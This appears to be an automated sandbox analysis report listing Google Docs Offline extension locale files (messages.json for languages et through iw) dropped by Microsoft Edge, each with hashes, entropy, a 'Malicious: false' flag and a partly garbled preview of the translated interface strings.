C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\et\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	968
Entropy (8bit):	4.633956349931516
Encrypted:	false
SSDEEP:	24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
MD5:	64204786E7A7C1ED9C241F1C59B81007
SHA1:	586528E87CD670249A44FB9C54B1796E40CDB794
SHA-256:	CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
SHA-512:	44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\eu\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	838
Entropy (8bit):	4.4975520913636595
Encrypted:	false
SSDEEP:	24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
MD5:	29A1DA4ACB4C9D04F080BB101E204E93
SHA1:	2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
SHA-256:	A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
SHA-512:	B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
Malicious:	false
Preview:	{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\fa\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1305
Entropy (8bit):	4.673517697192589
Encrypted:	false
SSDEEP:	24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
MD5:	097F3BA8DE41A0AAF436C783DCFE7EF3
SHA1:	986B8CABD794E08C7AD41F0F35C93E4824AC84DF
SHA-256:	7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
SHA-512:	8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\fi\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	911
Entropy (8bit):	4.6294343834070935
Encrypted:	false
SSDEEP:	12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
MD5:	B38CBD6C2C5BFAA6EE252D573A0B12A1
SHA1:	2E490D5A4942D2455C3E751F96BD9960F93C4B60
SHA-256:	2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
SHA-512:	6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
Malicious:	false
Preview:	{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\fil\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	939
Entropy (8bit):	4.451724169062555
Encrypted:	false
SSDEEP:	24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
MD5:	FCEA43D62605860FFF41BE26BAD80169
SHA1:	F25C2CE893D65666CC46EA267E3D1AA080A25F5B
SHA-256:	F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
SHA-512:	F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
Malicious:	false
Preview:	{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\fr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	977
Entropy (8bit):	4.622066056638277
Encrypted:	false
SSDEEP:	24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
MD5:	A58C0EEBD5DC6BB5D91DAF923BD3A2AA
SHA1:	F169870EEED333363950D0BCD5A46D712231E2AE
SHA-256:	0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
SHA-512:	B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\fr_CA\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	972
Entropy (8bit):	4.621319511196614
Encrypted:	false
SSDEEP:	24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
MD5:	6CAC04BDCC09034981B4AB567B00C296
SHA1:	84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
SHA-256:	4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
SHA-512:	160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\gl\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	990
Entropy (8bit):	4.497202347098541
Encrypted:	false
SSDEEP:	12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
MD5:	6BAAFEE2F718BEFBC7CD58A04CCC6C92
SHA1:	CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
SHA-256:	0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
SHA-512:	3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\gu\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1658
Entropy (8bit):	4.294833932445159
Encrypted:	false
SSDEEP:	24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
MD5:	BC7E1D09028B085B74CB4E04D8A90814
SHA1:	E28B2919F000B41B41209E56B7BF3A4448456CFE
SHA-256:	FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
SHA-512:	040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\hi\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1672
Entropy (8bit):	4.314484457325167
Encrypted:	false
SSDEEP:	48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
MD5:	98A7FC3E2E05AFFFC1CFE4A029F47476
SHA1:	A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
SHA-256:	D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
SHA-512:	457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
Malicious:	false
Preview:	{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\hr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	935
Entropy (8bit):	4.6369398601609735
Encrypted:	false
SSDEEP:	24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
MD5:	25CDFF9D60C5FC4740A48EF9804BF5C7
SHA1:	4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
SHA-256:	73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
SHA-512:	EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
Malicious:	false
Preview:	{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\hu\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1065
Entropy (8bit):	4.816501737523951
Encrypted:	false
SSDEEP:	24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
MD5:	8930A51E3ACE3DD897C9E61A2AEA1D02
SHA1:	4108506500C68C054BA03310C49FA5B8EE246EA4
SHA-256:	958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
SHA-512:	126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\hy\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2771
Entropy (8bit):	3.7629875118570055
Encrypted:	false
SSDEEP:	48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
MD5:	55DE859AD778E0AA9D950EF505B29DA9
SHA1:	4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
SHA-256:	0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
SHA-512:	EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
Malicious:	false
Preview:	{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\id\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	858
Entropy (8bit):	4.474411340525479
Encrypted:	false
SSDEEP:	12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
MD5:	34D6EE258AF9429465AE6A078C2FB1F5
SHA1:	612CAE151984449A4346A66C0A0DF4235D64D932
SHA-256:	E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
SHA-512:	20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
Malicious:	false
Preview:	{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\is\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	954
Entropy (8bit):	4.6457079159286545
Encrypted:	false
SSDEEP:	12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
MD5:	CAEB37F451B5B5E9F5EB2E7E7F46E2D7
SHA1:	F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
SHA-256:	943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
SHA-512:	A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
Malicious:	false
Preview:	{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\it\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	899
Entropy (8bit):	4.474743599345443
Encrypted:	false
SSDEEP:	12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
MD5:	0D82B734EF045D5FE7AA680B6A12E711
SHA1:	BD04F181E4EE09F02CD53161DCABCEF902423092
SHA-256:	F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
SHA-512:	01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\iw\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2230
Entropy (8bit):	3.8239097369647634
Encrypted:	false
SSDEEP:	24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
MD5:	26B1533C0852EE4661EC1A27BD87D6BF
SHA1:	18234E3ABAF702DF9330552780C2F33B83A1188A
SHA-256:	BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
SHA-512:	450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
Malicious:	false
Preview:	{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e

